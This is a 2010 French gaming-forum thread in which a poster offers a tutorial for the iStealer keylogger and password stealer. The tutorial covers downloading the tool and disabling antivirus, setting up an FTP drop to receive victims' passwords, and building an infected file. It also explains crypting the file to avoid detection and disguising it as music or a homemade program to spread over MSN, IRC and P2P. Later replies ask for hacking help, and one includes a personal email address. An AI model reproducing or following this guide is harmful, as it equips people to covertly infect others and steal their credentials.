Habbo Dreams Index du Forum
Habbo Dreams
Tes rêves deviennent réalités

Habbo Dreams Index du ForumFAQRechercherS’enregistrerConnexion

:: Istealer ::

Poster un nouveau sujet   Répondre au sujet    Habbo Dreams Index du Forum -> Discutions & astuces -> Partage de logiciel
Sujet précédent :: Sujet suivant  
Auteur Message
Paul

Masculin Taureau (20avr-20mai) 狗 Chien

MessagePosté le: Jeu 21 Jan - 16:33 (2010)    Sujet du message: Istealer Répondre en citant

Bonjour tout le monde,

iStealer est sans doute le meilleurs keylogger de l'année 2o10 , il envoie sur votre server FTP ( qu'il faut créer ) toutes les informations web de la

victime donc binder votre logiciel avec une music d'actualité (ou autres hobbies informatique ) et balancé le partout ya plus que a se servir en se

connectant directement sur le hosteur ou tout simplement avec Filezila (file zila est un logiciel permettant de se connecter a un ftp et d"aller

chercher les fichiers partagé ou envoiyé )

Tuto iStealer :
Source  : http://kalinsiak.kazeo.com/

Introduction :

Un Keylogger est un logiciel espion qui enregistre les touches frappées sur le clavier d'un ordinateur sous certaines options et les transmet via un réseau ou via des ondes électromagnétiques (plus d'informations ici).

Le Keylogger que je vais vous apprendre à utiliser se nomme iStealer, nous utiliserons la version 4.0 de ce dernier.

Pour l'utiliser, il vous faut:

- Un PC
- Un abonnement à Internet ou un moyen de récupérer un fichier sur le net
- Un serveur FTP

Je vous pris de bien suivre ce tutoriel et de ne pas sauter les étapes afin d'éviter de demander de l'aide par la suite.

Téléchargement :

Lien pour télécharger iStealer v4.0: http://www.mediafire.com/download.php?tklxgctnjdm

Vous devez posséder Winrar afin de décompresser l'archive. Il n'y a pas de mot de passe pour la décompresser, vous êtes libres d'utiliser ce lien comme bon vous semble (je tiens à dire par là que vous êtes responsables de ce que vous en faites).

Une fois téléchargé, décompressez l'archive et ouvrez Loader.exe afin de lancez le logiciel.

/!\  ATTENTION: Le logiciel est considéré comme malveillant par pas mal d'antivirus, donc éteignez votre antivirus si vous désirez l'ouvrir... /!\

Une fois ouvert voici la fenêtre que vous devriez avoir :
[img]http://i40.tinypic.com/2ektabc.jpg[/img]

Même si ce n'est pas très dur à savoir, à gauche vous avez les informations de votre FTP (dans lequel vous pourrez récupérer vos logs), vous pouvez "binder" votre fichier avec un autre et vous pouvez changer son icone. Au millieu il y à les options, avec la configuration des mots de passe que vous désirez dérober. Pour la fenêtre toute a droite nous en aurons pas besoin.

Créer son FTP :

Allez sur BlackAppleHost et inscrivez vous.

Une fois votre votre formulaire d'inscription terminée, il me semble que vous devez confirmer votre inscription en cliquant sur un lien que l'on va vous envoyer par mail.

Une fois inscrit, allez dans votre CP.
Vous verrez votre host ainsi que votre login, par exemple :

Vous.blackapplehost.com & votre login Vous

Téléchargez FileZilla afin de vous connecter simplement à votre FTP.

Configuration & création du fichier infecté :

On y est presque! Tenez bon il ne manque plus qu'à configurer le logiciel pour qu'il nous créer le fichier infecté que vous devrai distribuer!

Ouvrez iStealer v4.0 via Loader.exe.

Ecrivez les informations de votre FTP:
- Host: Vous.BlackAppleHost.com
- Login: Vous
- Password: Votre-Mot-De-Passe
- Directory: /

Puis cliquez sur Build.

ON Y EST !!!
VOUS AVEZ VOTRE PREMIER KEYLOGGER QUI EST PRET A SE REPANDRE !!!

Le fichier qui à été créé est le fichier à répandre afin de récupérer les mot de passes des personnes infectés. Ce fichier une fois ouvert envois tout les mot de passes sur votre serveur FTP, pour les récupérer utilisez le logiciel FileZilla.

Comment le répandre ?

Vous avez un problème, votre fichier est détecté par trop d'antivirus...

Il y a une solution ! Il vous suffit de "crypter" votre fichier afin de le rendre moins voir pas du tout détecté.
Pour celà il faut trouver un Crypter.

Une fois votre fichier crypté, essayé d'être innovant dans votre façon de le répandre, voici quelques exemples :

- Vous l'attachez à un logiciel.
- Vous dites que c'est votre premier logiciel que vous avez codé.
- Vous utilisez MSN, ICQ, IRC, Torrent, P2P... afin de le répandre.
- Vous pouvez changer l'icone afin de le rendre plus vrai.

Publicité

MessagePosté le: Jeu 21 Jan - 16:33 (2010)    Sujet du message: Publicité

PublicitéSupprimer les publicités ?
Kiwi

MessagePosté le: Jeu 21 Jan - 20:01 (2010)    Sujet du message: Istealer Répondre en citant

Rien Rien Rien Rien Compris !!

Paul

Masculin Taureau (20avr-20mai) 狗 Chien

MessagePosté le: Sam 23 Jan - 00:22 (2010)    Sujet du message: Istealer Répondre en citant

Lol, ses quand tu commence a savoir hacker Istealer ^^

FTP

MessagePosté le: Sam 23 Jan - 02:19 (2010)    Sujet du message: Istealer Répondre en citant

Le lien pour istealer est mort =/

Admin
Administrateur ™
Administrateur ™

Masculin Bélier (21mar-19avr)

MessagePosté le: Sam 23 Jan - 15:01 (2010)    Sujet du message: Istealer Répondre en citant

Je vais en cherche un qui n'est pas mort Wink

Visiter le site web du posteur MSN
FTP

MessagePosté le: Sam 23 Jan - 19:03 (2010)    Sujet du message: Istealer Répondre en citant

Merci =) d'avance =)

Cordialement : FTP

Invisible

Scorpion (23oct-21nov) 龍 Dragon

MessagePosté le: Lun 17 Jan - 22:35 (2011)    Sujet du message: Istealer Répondre en citant

salut tu poure maprendre a cree un script pour les de hc stp corfialement

Invisible

MessagePosté le: Lun 17 Jan - 22:35 (2011)    Sujet du message: Istealer Répondre en citant

sur habbo normal

Invisible

MessagePosté le: Lun 17 Jan - 22:39 (2011)    Sujet du message: Istealer Répondre en citant

mon adress florian-125@hotmail.fr

Contenu Sponsorisé

MessagePosté le: Aujourd’hui à 23:54 (2017)    Sujet du message: Istealer

Poster un nouveau sujet   Répondre au sujet    Habbo Dreams Index du Forum -> Discutions & astuces -> Partage de logiciel Toutes les heures sont au format GMT + 1 Heure
Page 1 sur 1

Sauter vers:  

Index | Panneau d’administration | créer un forum | Forum gratuit d’entraide | Annuaire des forums gratuits | Signaler une violation | Conditions générales d'utilisation
Thème By xSkatex.
Merci de respecter le travaille du créateur.